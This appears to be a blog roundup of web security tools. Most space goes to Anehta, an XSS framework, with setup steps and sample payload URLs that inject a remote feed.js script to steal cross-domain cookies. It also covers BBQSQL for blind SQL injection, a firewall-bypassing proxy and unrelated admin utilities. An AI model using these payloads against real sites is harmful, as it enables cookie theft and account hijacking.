Anehta V-0.6 released.

Anehta is Web Application tools for Security Audit.

 

=== Enviroment ===
1. PHP4/5 (PHP5 is recommended)
2. Apache or IIS
=== Install & Configure ===
1. Decompress all the files in a directory on your server
2. Make sure your directory has the write permission.
3. Modify $U as username and $P as password in “server/class/auth_Class.php” file.
Default username is “admin” and default password is “123456”.
4. If you want to send mail, modify “server/mail.php” file to your own mail server or mailbox.
=== Quick Start ===
1. Login and turn to the Configure tab.
2. Input the “anehtaurl” as the url where your anehta is.
For example: “http://www.a.com/anehta”.
3. You should also input the boomerang src and boomerang target.
boomerang src is usually the same page where you put your feed.js is.
For example: boomerang src maybe: “http://www.b.com/xssed.html?param=<script src=http://www.a.com/anehta/feed.js></script>”.

boomerang target must be the page where you want to steal cross domain cookie.
For example: boomerang target maybe: “http://www.alimafia.com/xssDemo.html#’><script src=http://www.a.com/anehta/feed.js></script><‘”.

You can modify feed.js to cancel the xcookie module if you do not want to use boomerang.
But you must always set boomerang src and target values when you modify in the configure tab.

4. After modified configure, simply load feed.js as a external script to where your xss page is.
There is also a demo page in the directory which is “demo.html”

5. Refresh the admin.php, and you may see some changes if your xss slave coming.

Downnload In here | Read more Right here

 

Advertisements

BBQSQL is a blind SQL injection framework written in Python.

Change current released : fixing help menu
Blind SQL injection can be a pain to exploit. When the available tools work they work well, but when they don’t you have to write something custom. This is time-consuming and tedious. BBQSQL can help you address those issues.
BBQSQL is a blind SQL injection framework written in Python. It is extremely useful when attacking tricky SQL injection vulnerabilities. BBQSQL is also a semi-automatic tool, allowing quite a bit of customization for those hard to trigger SQL injection findings. The tool is built to be database agnostic and is extremely versatile. It also has an intuitive UI to make setting up attacks much easier. Python gevent is also implemented, making BBQSQL extremely fast.

Overview of Readme
We tried to write the tool in such a way that it would be very self explanatory when setting up an attack in the UI. However, for sake of thoroughness we have included a detailed Readme that should provide you additional insight on the specifics of each configuration option. One thing to note is that every configuration option in the UI has a description associated with it, so if you do choose to fire up the tool without reading this page you should be able to hack your way through an attack.

High Level Usage
Similar to other SQL injection tools you provide certain request information.

Must provide the usual information:

  • URL
  • HTTP Method
  • Headers
  • Cookies
  • Encoding methods
  • Redirect behavior
  • Files
  • HTTP Auth
  • Proxies

Then specify where the injection is going and what syntax we are injecting. Read on for details.

Install
After you pull the tool from Github, you can install simply by typing:

python setup.py install

Download in here | Read more right here

Secure Content Management System

SCMS is an MVC based secure content management system. It is designed from the ground up to withstand common Web application vulnerabilities. It is designed for PHP 5.0-5.2.x and MySQL 4.1+, and it can optionally support PostgreSQL as a database backend.

Features

  • Per Action SSL/NonSSL Enforcement
  • Full XHTML 1.0 Transitional Conformity
  • Full CSS2 Conformity
  • Role Based OO (Object Orientated) Design
  • Designed for PHP5+
  • Works with MySQL and Others (currently untested)
  • Implements MVC Design Pattern
  • Per Action SSL/NonSSL Enforcement
  • Implements Singleton Design Pattern
  • Strict IO (Input/Output) Validation
  • Custom Session Handling With Idle Session Expiration & Session Identifier Regeneration
  • User Account Locking With Both Automatic & Manual Unlocking Methods
  • Event Logging
  • Password Aging/Expiration
  • Support for secure (When run over SSL) AND httponly Cookies
  • Improved CSRF Protection By Using Random Form CSRF Tokens
  • Support for all PHP5 Hashing Algorithms as well as MySQL’s AES and DES Encryption
  • Optional Captcha Images
  • Optional Session Data Encryption
  • Optional Per Request Session IP Checking

Download in here  | read more right here 

Turm – The *nix remote manager

Web-GUI and user-extensible command library for managing applications and services remotely.

The primary goal is to create a system that can manage:
– LXC Containers
– Libvirt virtual networks
– OpenVPN networks
– Reverse proxies for IPv4
– IPv6 networking
– Web-Hosting applications
– Content Management System’s
– Simple configuration commands and routines

The end game is an administrator tool that can manage even a complex cloud-computing-like system as a hybrid virtual and real server farm.

Turm can run from any LAMP system, (Linux Apache MySql PHP), and control any SSH-accessible client. Unix/Linux, Os X, and possibly even Windows via freeSSHd.
Features

  • User/Project Tree model
  • Realtime operations over SSH on the remote systems.
  • MySQL based PHP generated jQuery, jqGrid frontend.
  • Modular, extensible design.

Download in here
read more right here :

SchemaCrawler

SchemaCrawler is an open-source Java API that makes working with database metadata as easy as working with plain old Java objects.
SchemaCrawler is also a database schema discovery and comprehension, and schema documentation tool. You can search for database schema objects using regular expressions, and output the schema and data in a readable text format, and find potential design issues with lint . The output is designed to be diff-ed against other database schemas.
SchemaCrawler supports almost any database that has a JDBC driver, but for convenience is bundled with drivers for some commonly used RDBMS systems. SchemaCrawler works with any operating system that supports Java.
Features

  • SchemaCrawler grep to find tables and columns using regular expressions
  • Schema lint to find problems with schema design
  • Scipting against your database, using JavaScript
  • Database diagramming

Download Latest Version In here 

Read more Right Herehttp://schemacrawler.sourceforge.net/

PHProxy++ is a web HTTP proxy with SSL support programmed in PHP.

PHProxy is a web HTTP proxy with SSL support programmed in PHP meant to bypass firewalls and access otherwise inaccessible resources (i.e. blocked websites). If the server this script is run on can access a resource, so can you!

Download In here | Read more Right Here

Linkcrawler – Capable to “Crawl” a site and return a report all links from it

Java Desktop application capable to “Crawl” a site and return a report of the status of all the link present at the page, then it moves to another internal page and so on.LinkCrawlers provides a nice HTML5 report with the information of all link per WebPage, Easy to Read. This tool is useful for Web QA testers


Features

  • “Crawls” a Site and gather information about Internal and External Links
  • Checks link status (based on HTTP status codes)
  • Added exclusion list
  • Added Depth Control. You can indicate how far LinkCrawler will go
  • Added Image tag src attribute checking (Broken images)
  • Capable to use HTTP Authentication
  • Good performance when crawling big sites (1000 links per page)
  • Saves report in HTML Format
  • Validates XML Sitemap

Download in here
Read more right here : http://www.carlosumanzor.com/